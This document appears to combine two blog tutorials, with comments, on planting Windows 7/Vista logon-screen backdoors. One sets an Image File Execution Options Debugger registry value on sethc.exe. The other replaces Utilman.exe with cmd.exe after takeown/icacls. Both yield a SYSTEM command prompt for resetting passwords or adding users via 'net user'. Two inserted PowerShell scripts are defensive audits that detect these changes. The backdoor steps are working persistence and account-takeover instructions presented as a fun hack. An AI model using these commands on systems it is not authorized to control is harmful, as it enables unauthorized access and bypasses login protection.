
Backdoor to Reset Administrator Password or Add New User in Windows 7
As long as there is physical access to a computer, it is always possible to gain access to the
operating system even if it is password protected. For example, you can use Kon-Boot to
login to any user account in Windows with any password by booting up the computer with
the CD or USB. If BIOS is secured with a password to prevent changing of boot order, you
can change the jumpers or remove the battery from the motherboard to clear the CMOS
settings. As long as you can boot up the computer with CD or USB, there are quite a lot of
tools that allow you to reset the user account password even if you don’t know the original
password.
Here is an interesting method which I recently discovered that allows you to plant a
backdoor to your Windows 7 operating system so that you can always reset a password or
even add a new user account without first logging in to Windows. This method is a bit
restrictive because it requires administrator privilege on the computer in order to make
changes to the system, but it does not involve installing any third party software or
changing any system files like the old DreamPackPL.
This backdoor allows you to run command prompt (cmd.exe) with system privilege from
the Windows 7 login screen. With a system privilege command prompt in your hands,
you can do a lot of things, from creating new accounts to resetting the administrator
password to gain access to the password protected Windows. Check out these step-by-step
instructions:
1. First, make sure you are logged in as an administrator. Click on the start button, type
cmd in the Search programs and files bar, right click on the cmd.exe that is displayed on the
list and select “Run as administrator”.
2. Copy the command below and paste it to the command prompt.
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
If you see the message that says “The operation completed successfully”, that means you
have installed the backdoor. If not, make sure you are logged in to a user account with
administrator privilege and also run the cmd as administrator.

3. When you are at the login screen, you can either press the SHIFT key continuously for 5 times or Alt+Shift+PrintScreen which will open a command prompt with system privilege.
You can now do whatever you want with it such as typing:
Explorer – To launch explorer and give you access to Start menu and taskbar. Any attempt to run Windows Explorer will prompt an error saying “The server process could not be started because the configured identity is incorrect. Check the username and password”. If you need to check the files and folders on the system, use the dir command instead in cmd.

Net user user_name new_password – This command allows you to set a new password to any username without knowing the current password.
Net user user_name password /add – This command allows you to add a new user to the system so you can login to Windows without touching the existing user accounts.
Here is a simple explanation on how this backdoor works. In the Windows login screen, you are allowed to turn on sticky keys or high contrast using the hotkeys (Shift x 5 OR Alt+Shift+PrintScreen). Attempting to turn on either one will launch the sethc.exe file. Adding the provided registry value tells Windows that you want to run cmd.exe as a debugger for sethc.exe, but the problem is Windows does not check if it is a valid debugger. So whenever you try to launch sticky keys or high contrast in the Windows 7 login screen, you will run the command prompt instead. This proof of concept has been around for a very long time and is not really an exploit which is why Microsoft does not intend to patch and block it.
To remove or uninstall the backdoor, simply delete the registry value that you have added or paste the command below to an elevated command prompt followed by pressing the Y key to confirm the deletion.
REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
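To check whether a machine already carries this registry change, the following read-only audit lists every Debugger value under Image File Execution Options and marks the ones attached to logon-screen programs. It is an added example, not part of the original article, and it goes beyond sethc.exe: the other names in the watch list are an assumption, as is PowerShell 3.0 or later.

```powershell
# Added example, not from the original article. Read-only audit of
# Image File Execution Options (IFEO) for Debugger values.
$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# sethc.exe is the program named in the article. The other names are an
# assumed watch list of accessibility programs the logon screen can start.
$logonScreenImages = 'sethc.exe', 'utilman.exe', 'osk.exe', 'magnify.exe',
                     'narrator.exe', 'displayswitch.exe', 'atbroker.exe'

function Get-IfeoDebugger {
    param(
        [string]$Root = $ifeo,
        [string[]]$WatchList = $logonScreenImages
    )
    # Each subkey is named after an executable; only subkeys carrying a
    # Debugger value redirect the launch to another program.
    Get-ChildItem -LiteralPath $Root -ErrorAction Stop | ForEach-Object {
        $debugger = $_.GetValue('Debugger')
        if ($null -ne $debugger) {
            [pscustomobject]@{
                Image       = $_.PSChildName
                Debugger    = $debugger
                LogonScreen = $WatchList -contains $_.PSChildName
                Key         = $_.Name
            }
        }
    }
}

$findings = @(Get-IfeoDebugger | Sort-Object LogonScreen -Descending)
if ($findings.Count -eq 0) {
    'No Debugger values found under Image File Execution Options.'
} else {
    $findings | Format-List
    $hits = @($findings | Where-Object { $_.LogonScreen })
    if ($hits.Count -gt 0) {
        Write-Warning ("{0} logon-screen program(s) have a Debugger set." -f $hits.Count)
    }
}
```

A Debugger value on a program that no debugging tool is expected to intercept deserves review whether or not it is on the watch list.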

Unlock For Us
Hidden Backdoor in Windows 7/Vista Welcome Screen

Ok. Anyone of you watch the famous 1995 movie "The Net" by Sandra Bullock? The Famous Praetorian PI was used as a backdoor to access password-protected sites. This is fun. Can we create a Vista backdoor, something like that in Windows Vista or 7? Yes you Can!
How? The Clue: The Ease of Access Program
Where? The 624kb Utilman.exe is the key located at System Folder.

Steps:
Open the Folder Windows\System32\ and check the Properties of Utilman.exe.

Problem: My current Logon Username Lawrence and Administrators have no Permission to modify the file. Thus, Most of the Buttons are Disabled. Also, If you try to rename the file, it will give you the message:
Destination Folder Access is Denied
You need permission to perform this action
Normally, Winbubble Context Menu "Take the Ownership of this file" can add the permission but this time, you can't. (The Next Version can do it easily).

How to Add the permission

Prevention is better than Cure: To easily recover your system from any problems, Create a Restore Point First using the Context Menu that can be created by WinBubbles. Read here or you can do it manually: Win+R > rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4 > Create Button > Enter the name

1. Take the Ownership Of the File using the LONG METHOD. Click here and Right-Click the file > Properties > Go to Security Tab > To change Permission Click Edit Button > Click Administrator > Click to Check Allow Setting of Full Control option box
Another Way because I understand that you're a Geek: Open Command Prompt as Administrator. Start Search > type CMD > Press CTRL+ALT+Enter > Enter the Following commands:
a. takeown /f "Directory\File"
e.g. takeown /f "c:\windows\system32\Utilman.exe"
b. icacls "Directory\File" /grant administrators:F
e.g. icacls "c:\windows\system32\Utilman.exe" /grant administrators:F
If you didn't open CMD.exe as administrator, you'll get this message:
ERROR: The current logged on user does not have ownership privileges on the file (or folder) "c:\windows\system32\Utilman.exe"
2. Rename Utilman.exe to any for backup example: Utilman_old.exe
3. Create a copy of cmd.exe (CTRL+Drag)
4. Rename the Copy, cmd, to Utilman
That's It! Go to your Welcome Screen: Start Menu > At the Bottom, Click the Right Arrow > Switch User
5. Click the Blue Magic Button pointed by the arrow as shown in the first Picture above.
You have now successfully launched a Command Prompt in Administrator mode with UAC disabled.

Doesn't Work? Possible Mistake: In your Folder Option Window > View Tab > If "Hide extensions for known file types" is checked, Don't rename it to "Utilman.exe", use "Utilman" ONLY.
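The steps above leave three traces on disk: the file named Utilman.exe is byte-identical to cmd.exe, its version information names a command shell, and its owner is no longer TrustedInstaller because of the takeown and copy. The check below looks for all three. It is an added example, not code from the original post; it assumes PowerShell 4.0 or later (for Get-FileHash), and every target name other than Utilman.exe is an assumption.

```powershell
# Added example, not from the original post. Read-only check for
# logon-screen accessibility programs swapped for a command shell.
$sys32   = Join-Path $env:SystemRoot 'System32'
# Utilman.exe is the file replaced in the post; the others are assumed extras.
$targets = 'Utilman.exe', 'sethc.exe', 'osk.exe', 'Magnify.exe', 'Narrator.exe'
# Windows system files are normally owned by this service account.
$trusted = 'NT SERVICE\TrustedInstaller'

function Test-AccessibilityBinary {
    param(
        [string]$Directory = $sys32,
        [string[]]$Names = $targets
    )
    $cmdPath = Join-Path $Directory 'cmd.exe'
    $cmdHash = (Get-FileHash -LiteralPath $cmdPath -Algorithm SHA256).Hash
    foreach ($name in $Names) {
        $path = Join-Path $Directory $name
        if (-not (Test-Path -LiteralPath $path)) { continue }
        $hash     = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $original = (Get-Item -LiteralPath $path).VersionInfo.OriginalFilename
        $owner    = (Get-Acl -LiteralPath $path).Owner
        $reasons  = @()
        # Step 3 and 4 of the post: a plain copy of cmd.exe under a new name.
        if ($hash -eq $cmdHash) { $reasons += 'identical to cmd.exe' }
        # The embedded version resource survives a rename.
        if ($original -match '^(cmd|powershell)\.exe') {
            $reasons += "version info says $original"
        }
        # takeown, or copying a file in, changes the owner.
        if ($owner -ne $trusted) { $reasons += "owner is $owner" }
        [pscustomobject]@{
            File       = $path
            SHA256     = $hash
            Owner      = $owner
            Suspicious = ($reasons.Count -gt 0)
            Reasons    = $reasons -join '; '
        }
    }
}

Test-AccessibilityBinary | Format-List
```

An owner mismatch on its own can remain after the original file has been restored, so read it together with the hash and version-info results.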

NEW! Using the newest version of WinBubble, you can easily get this functionality in just few clicks! Click the Windows 7/Utilities Tab, Logon Tools option, Click Yes and Restart your PC. Works great in Windows 7 32/64 bit version!
NOTE: You need to re-open again the program after restarting your computer and repeat the procedure again to be able to activate the feature.

SWEET!!! Start Hacking your own computer :)
Net user [Username] [NewPassword]
For more Information, Read Here

Now, it's fine for me to forget my password without creating a password reset disk or by hacking and clearing Vista Password using a Linux OS. Create a Backdoor instead!

Is this bad? Of course, this is bad if you'll use it that way.
Is this legal? Yes, it is. My steps need the Administrator login to create a backdoor and If you do this by using another OS like Linux to another computer, That's the time it will become Illegal.

Type: whoami /all |more
Now we can see that System logon is the one running when you input Username and Password in the Welcome Screen.
Try typing taskmgr.exe (Browse Button lets you run a mini-windows explorer), Notepad and even Explorer.exe!

In my observations:
Windows Firewall is ON (Great!)
Spyware and other Malware Protection is ON (Great!)
User Account Control is OFF
You can browse the Internet
The Location of Desktop: c:\Windows\System32\config\systemprofile\Desktop
Launch Windows Media Player, Windows Calendar, Windows Mail and many more

Note: There is a possibility that the guide above will work in latest build (RC version) of Windows 7. Due to License and some legal concerns I can't reveal any data. Tell me?

ENJOY LEARNING WINDOWS!!!

6 Comments:

vince said...
nice hack, but won't that just defeat the purpose of the welcome screen? why not just forget your password for your username all together and boot directly to the desktop :)
November 20, 2008 at 10:11 PM

Anonymous said...
Wait, are you saying that you have Windows 7 Beta? Just wondering. Or can you not tell us that either?
November 20, 2008 at 11:32 PM

Anonymous said...
It works! I have Windows 7 Build 6801 leaked from torrents and it worked perfectly! I am waiting to download "The Net (1995)". I am curious ;)
November 22, 2008 at 11:23 PM

Nura M. said...
Hi! I have forgotten that movie (The Net) you were talking about. I do not know if I may be opportuned to have a look at it (refer me to site), so that I can answer the question. I WISH TO HAVE MORE OF YOUR EDUCATING INFORMATION. Thanks! Nura
November 23, 2008 at 9:44 PM

Anonymous said...
